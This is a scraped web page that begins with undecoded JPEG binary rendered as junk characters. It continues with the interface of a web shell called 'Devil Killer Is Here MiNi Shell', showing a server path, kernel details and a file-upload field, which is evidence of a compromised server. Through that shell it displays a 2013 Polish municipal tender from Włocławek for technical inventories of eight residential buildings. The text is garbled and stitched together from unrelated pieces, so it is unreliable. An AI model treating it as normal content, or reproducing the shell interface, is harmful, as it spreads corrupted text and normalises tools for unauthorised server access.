JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131017/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131017/216849-N-2013.html

<p class="kh_header"><b>Włocławek: Wykonanie wielobranżowej inwentaryzacji 
budynków mieszkalnych - II etap.</b><br>
<b>Numer ogłoszenia: 216849 - 2013; data zamieszczenia: 17.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Zasobów Komunalnych , ul. Ostrowska 30, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 54 414 48 50, faks 54 414 48 84.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.azm.wloclawek.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie wielobranżowej inwentaryzacji 
budynków mieszkalnych - II etap..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji technicznej - wielobranżowej, inwentaryzacji budynków mieszkalnych, wyszczególnionych w pkt II ppkt 7 siwz oraz w formularzu cenowym, stanowiącym załącznik nr 1 do specyfikacji istotnych warunków zamówienia w następujących branżach: architektoniczno - budowlanej, instalacji wodno - kanalizacyjnej, instalacji c.o. (lub innej instalacji grzewczej) i c.w.u., instalacji elektrycznej i piorunochronnej, instalacji gazowej, innych instalacji występujących w każdym z budynków (np. telekomunikacyjnej, RTV, domofonu, itp.) - wyłącznie w części opisowej. Wyżej wymieniona dokumentacja winna być sporządzona w sposób analogiczny jak sporządzenie projektu budowlanego (zgodnie z Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego - Dz.U. z 2012 r. poz. 462 z późn. zm.) - z pominięciem zapisów ww. rozporządzenia odnoszących się, z natury rzeczy do projektów budowlanych, obiektów nowo wznoszonych (np. uzgodnień, pozwoleń, części dotyczącej zagospodarowania działki, obliczeń statycznych, badań geotechnicznych, mapy do celów projektowych itp.) oraz z pominięciem zapisów ww. rozporządzenia dotyczących obiektów o innej funkcji niż mieszkalno - użytkowa. Dokumentację należy wykonać w wersji graficznej (tradycyjnej) w ilości 2 egzemplarzy oraz w wersji cyfrowej na nośnikach, w formacie źródłowym oraz rysunki dodatkowo w formacie DXF i PDF. Wersję cyfrową należy dołączyć do każdego egzemplarza dokumentacji. Zamawiający wymaga, aby dokumentacja inwentaryzacji zawierała w szczególności: we wszystkich branżach część opisową i rysunkową (w skali nie mniejszej niż 1:100), z wyjątkiem tzw. innych instalacji, dla których wymagana jest wyłącznie część opisowa. W branży architektoniczno - budowlanej: a) w części opisowej, oprócz opisu technicznego - również zestawienia tabelarycznego: powierzchni użytkowych poszczególnych lokali i części wspólnych dla każdej kondygnacji, łącznej powierzchni użytkowej każdej kondygnacji, tj. sumy powierzchni użytkowych poszczególnych lokali i części wspólnych, powierzchni użytkowej budynku, powierzchni zabudowy. Wyżej wymienione powierzchnie należy określać zgodnie z art. 2 ust.1. pkt 7 i ust. 2 ustawy z dnia 21 czerwca 2001 r. o ochronie praw lokatorów, mieszkaniowym zasobie gminy i o zmianie Kodeksu cywilnego (Dz.U.05.31.266 z późniejszymi zmianami) oraz normą PN - ISO 9836:1997 - Właściwości użytkowe w budownictwie - określanie i obliczanie wskaźników powierzchniowych i kubaturowych. Przy określaniu powierzchni użytkowej poszczególnych lokali, w przypadku wspólnego pomieszczenia (np. korytarza użytkowanego przez lokatorów dwóch lokali) powierzchnię tego pomieszczenia należy wliczyć do każdego z tych lokali, proporcjonalnie do powierzchni pozostałych pomieszczeń wchodzących w skład każdego z tych lokali. W części opisowej należy również podać - zgodnie z normą PN-ISO 9836:1997 - kubatury budynku określone w pkt. 5.2.2, 5.2.3 i 5.2.5 ww. normy. Wyżej wymienione powierzchnie i kubatury należy podać osobno dla każdego budynku. W przypadku wspólnoty mieszkaniowej ul. Szpitalna 3/5 (cz. V zamówienia) w/wym. dane należy podać osobno dla każdego z budynków i dodatkowo łącznie dla budynków tworzących jedną wspólnotę mieszkaniową .b) W części rysunkowej: plan sytuacyjny (wykonany na mapce sytuacyjno - wysokościowej w skali 1:500 do celów informacyjnych), z wyraźnym oznaczeniem budynku/budynków będącego przedmiotem inwentaryzacji oraz oznaczeniem wejścia/wejść wraz z opisem numeru budynku, do którego wejście oznaczono. Uzyskanie mapki leży po stronie Wykonawcy, rzut piwnic z zaznaczeniem do którego lokalu przynależy każda z piwnic, rzuty wszystkich kondygnacji (nawet, jeśli są to tzw. kondygnacje powtarzalne) z oznaczeniem numerowym poszczególnych lokali, rzut więźby dachowej wraz z niezbędnymi widokami i przekrojami, rzut połaci dachowej, przekroje poprzeczne (w tym przez klatkę schodową) i szczegóły niezbędne (wraz z rzutami kondygnacji) do przedstawienia układu funkcjonalno - przestrzennego budynku, rysunki i zdjęcia elewacji. W branżach instalacyjnych, w części rysunkowej: a) przyłącza zaznaczone na planie sytuacyjnym, z zaznaczeniem punktu odcięcia mediów, b) rysunki przebiegu instalacji wewnętrznych na wszystkich kondygnacjach, z zaznaczeniem przekrojów, c) schematy i szczegóły niezbędne do pokazania przebiegu i budowy instalacji. Zamawiający nie wymaga od Wykonawcy inwentaryzacji węzłów cieplnych stanowiących własność MPEC. W tym przypadku wymaga jedynie wykonania inwentaryzacji pomieszczenia, w którym znajduje się węzeł. Zamawiający wymaga wykonania inwentaryzacji węzłów cieplnych stanowiących własność wspólnot mieszkaniowych. Inwentaryzacja węzłów cieplnych stanowiących własność wspólnot mieszkaniowych winna zawierać: a) schemat technologiczny węzła, b) niezbędne rzuty i przekroje z lokalizacją urządzeń podstawowych (wymienniki, rozdzielacze, licznik ciepła, naczynie wzbiorcze, studnia schładzająca, punkt poboru wody, liczniki elektroenergetyczne). W przypadku występowania wspólnych instalacji dla kilku budynków tworzących jedną wspólnotę mieszkaniową należy ten fakt uwidocznić w części opisowej i rysunkowej (budynki posiadające wspólne przyłącza wody, gazu, energii elektrycznej lub wspólne odprowadzenie ścieków do kolektora kanalizacji sanitarnej). Wymogi Zamawiającego dotyczące szczegółowości wykonania przedmiotu zamówienia, w związku z brakiem wymogu wykonania odkrywek elementów budynku są następujące: Zamawiający oczekuje od Wykonawcy doświadczenia w wykonywaniu inwentaryzacji technicznej budynków, które umożliwi przedstawienie w opracowaniu będącym przedmiotem zamówienia budowy i usytuowania elementów konstrukcyjnych budynku oraz budowy i przebiegu instalacji, bez wykonania odkrywek. Jeżeli w uzasadnionych przypadkach, mimo deklarowanego przez Wykonawcę doświadczenia, pokazanie budowy i usytuowania elementów konstrukcyjnych budynku oraz budowy i przebiegu instalacji okaże się niemożliwe Zamawiający dopuszcza: w przypadku braku możliwości określenia bez odkrywek szczegółowej budowy stropów lub rozmieszczenia belek stropowych, Zamawiający dopuszcza w części rysunkowej oznaczenie tylko kierunku oparcia stropów. W przypadku braku możliwości określenia bez odkrywek szczegółowego przebiegu instalacji wodno - kanalizacyjnej, c.o. i c.w.u. Wykonawca winien uwidocznić ten fakt zarówno w części opisowej jak i rysunkowej - jeśli dotyczy to niewielkiej części instalacji. W przypadku braku możliwości określenia bez odkrywek szczegółowego przebiegu instalacji elektrycznej, Zamawiający dopuszcza w części rysunkowej pokazania na rzutach kondygnacji: złącza kablowego, tablic, punktów świetlnych sufitowych i ściennych, wyłączników lub przełączników oświetleniowych oraz gniazd wtyczkowych. Wymagania Zamawiającego wobec Wykonawcy dotyczące szczegółowości wykonania przedmiotu zamówienia związane z dostępem do lokali i części wspólnych są następujące: uzgodnienie terminów pomiarów i oględzin z najemcami lokali komunalnych, właścicielami lokali wykupionych bądź z Zarządami Wspólnot Mieszkaniowych lub zarządcą budynku leży po stronie Wykonawcy. Wykonawca winien z odpowiednim wyprzedzeniem uzgodnić z użytkownikami budynków dogodny dla nich termin wykonania pomiarów i oględzin. Zamawiający oczekuje od Wykonawcy podjęcia wielokrotnych prób (w przypadku stwierdzenia nieobecności użytkowników lokali) mających na celu uzyskanie ww. dostępu. W przypadku trudności w uzyskaniu powyższego oraz w przypadku odmowy udostępnienia lokalu przez jego użytkownika, Wykonawca zobowiązany jest zwrócić się do Zamawiającego. W przypadku kategorycznej odmowy udostępnienia lokalu przez właściciela lokalu wykupionego, mimo wielokrotnych prób, Wykonawca winien uzyskać od Zarządu Wspólnoty Mieszkaniowej i Zamawiającego zaświadczenie o braku możliwości wstępu do lokalu. W przypadkach opisanych powyżej lub w przypadku stwierdzenia, że lokal jest niezamieszkały (tu również wymagane jest uzyskanie zaświadczenia) Zamawiający dopuszcza: a) W części opisowej: obliczenie niezbędnych wskaźników dotyczących budynku (np. kubatury, powierzchni użytkowej) na podstawie przypuszczalnego obrazu danego lokalu(na podstawie inwentaryzacji lokali wyżej i niżej położonych) z wyraźnym stwierdzeniem w tej części, że lokal (lokale) nie został udostępniony, b) W części rysunkowej: naniesienie tego lokalu na rzutach i przekrojach budynku, na podstawie inwentaryzacji lokali wyżej i niżej położonych (o ile układ konstrukcyjny wskazuje, że takie odtworzenie będzie bliskie rzeczywistemu) z wyraźnym zaznaczeniem w tej części, że lokal nie został udostępniony, c) W przypadku braku możliwości odtworzenia przypuszczalnego obrazu lokalu (na podstawie inwentaryzacji lokali wyżej i niżej położonych) należy w części rysunkowej pozostawić wolne miejsce i wpisać uwagę, że dany lokal nie został udostępniony, a w części opisowej podać wskaźniki dot. Budynku (np. kubaturę, pow. Użytkową) bez uwzględnienia tego lokalu z wyraźnym określeniem, że wskaźnik ten nie uwzględnia danego lokalu. Wykaz nie udostępnionych lokali winien być dołączony do każdego egzemplarza inwentaryzacji budynku, którego dotyczy, d) W przypadku braku dostępu do większej ilości lokali w budynku lub nieruchomości wspólnej Wykonawca winien sprawę zgłosić do Zamawiającego, który podejmie stosowne działania. Jeżeli, mimo ww. działań, lokale lub nieruchomość wspólna nie zostaną udostępnione Zamawiający zastrzega prawo do rezygnacji z wykonania inwentaryzacji tego budynku i odpowiedniego pomniejszenia wynagrodzenia za wykonanie danego zadania. Wykaz budynków: ul. Bulwary 24, ul. Kraszewskiego 23, ul. Kraszewskiego 25, ul. Piekarska 3, ul. Szpitalna 3/5, ul. Św. Antoniego 48, ul. Zielony Rynek 1, ul. Zielony Rynek 17. Dokumentacja inwentaryzacji będąca przedmiotem zamówienia powinna odpowiadać przepisom Prawa Budowlanego i Polskim Normom. Dokumentacja winna być wykonana z należytą dokładnością i starannością. Wykonawca udzielić musi minimum 24-miesiecznej gwarancji jakości przekazanej dokumentacji.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.25.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca, ubiegający się o udzielenie zamówienia, musi wykazać się należytym wykonaniem w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch usług o wartości minimum 5000,00 zł brutto, polegających na wykonaniu wielobranżowej inwentaryzacji technicznej budynków mieszkalnych lub użytkowych lub jednej usługi polegającej na sporządzeniu kompletnego projektu budynku mieszkalnego o kubaturze minimum 5000 m3</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca, ubiegający się o udzielenie zamówienia, musi dysponować potencjałem kadrowym - własnym lub wyrażającym gotowość do współpracy - zdolnym do wykonania zamówienia, w szczególności co najmniej jedną osobą posiadającą uprawnienia w specjalności architektonicznej, co najmniej jedną osobą posiadającą uprawnienia w specjalności konstrukcyjno-budowlanej, co najmniej jedną osobą posiadającą uprawnienia w specjalności instalacyjnej, w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych, co najmniej jedną osobą posiadającą uprawnienia w specjalności instalacyjnej w zakresie instalacji i w zakresie urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>co najmniej dwóch usług o wartości minimum 5000,00 zł brutto, polegających na wykonaniu wielobranżowej inwentaryzacji technicznej budynków mieszkalnych lub użytkowych lub jednej usługi polegającej na sporządzeniu kompletnego projektu budynku mieszkalnego o kubaturze minimum 5000 m3;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość wprowadzania zmian w umowie w stosunku do treści oferty, które będą mogły być dokonane z powodu zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy lub w przypadku zmiany osób wymienionych w umowie po stronie którejkolwiek ze stron. Wszelkie zmiany umowy wymagają pod rygorem nieważności formy pisemnej i podpisania przez obie strony. Wszelkie zmiany mogą być wprowadzone do umowy w okolicznościach i na zasadach opisanych powyżej, wyłącznie przed zakończeniem terminu realizacji umowy. Z wnioskiem o zmianę treści umowy może wystąpić zarówno Wykonawca, jak i Zamawiający</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.azm.wloclawek.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Administracja Zasobów Komunalnych, ul. Ostrowska 30, 87-800 Włocławek, pok. 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.10.2013 godzina 08:15, miejsce: Administracja Zasobów Komunalnych, ul. Ostrowska 30, 87-800 Włocławek, pok. 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ul. Bulwary 24.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Całkowita powierzchnia użytkowa budynku - 1672,51 m2, liczba kondygnacji (w tym piwnice) - 3,liczba lokali - 15, branże: architektoniczno-budowlana, wod.-kan., elektryczna i piorunochronna.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.25.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ul. Kraszewskiego 23.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Całkowita powierzchnia użytkowa budynku - 785,60 m2, liczba kondygnacji (w tym piwnice) - 3+strych, liczba lokali - 8, branże: architektoniczno-budowlana, wod.-kan., gazowa, elektryczna i piorunochronna.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.25.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ul. Kraszewskiego 25.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Całkowita powierzchnia użytkowa budynku - 785,60 m2, liczba kondygnacji (w tym piwnice) - 3 + strych, liczba lokali - 7, branże: architektoniczno-budowlana, wod.-kan., gazowa, elektryczna i piorunochronna.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.25.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ul. Piekarska 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Całkowita powierzchnia użytkowa budynku - 2418,00 m2, liczba kondygnacji (w tym piwnice) - 5, liczba lokali - 23, branże: architektoniczno-budowlana, wod.-kan., elektryczna i piorunochronna.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.25.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ul. Szpitalna 3/5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ul. Szpitalna 3/5 Całkowita powierzchnia użytkowa budynku - 1258,59 m2, liczba kondygnacji (w tym piwnice) - 3 (w każdym z budynków), liczba lokali - 8 (w każdym z budynków), branże: architektoniczno-budowlana, wod.-kan., elektryczna i piorunochronna;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.25.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> ul. Św. Antoniego 48.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Całkowita powierzchnia użytkowa budynku - 857,00 m2, liczba kondygnacji (w tym piwnice) - 4, liczba lokali - 13, branże: architektoniczno-budowlana, wod.-kan., c.o., elektryczna i piorunochronna.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.25.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
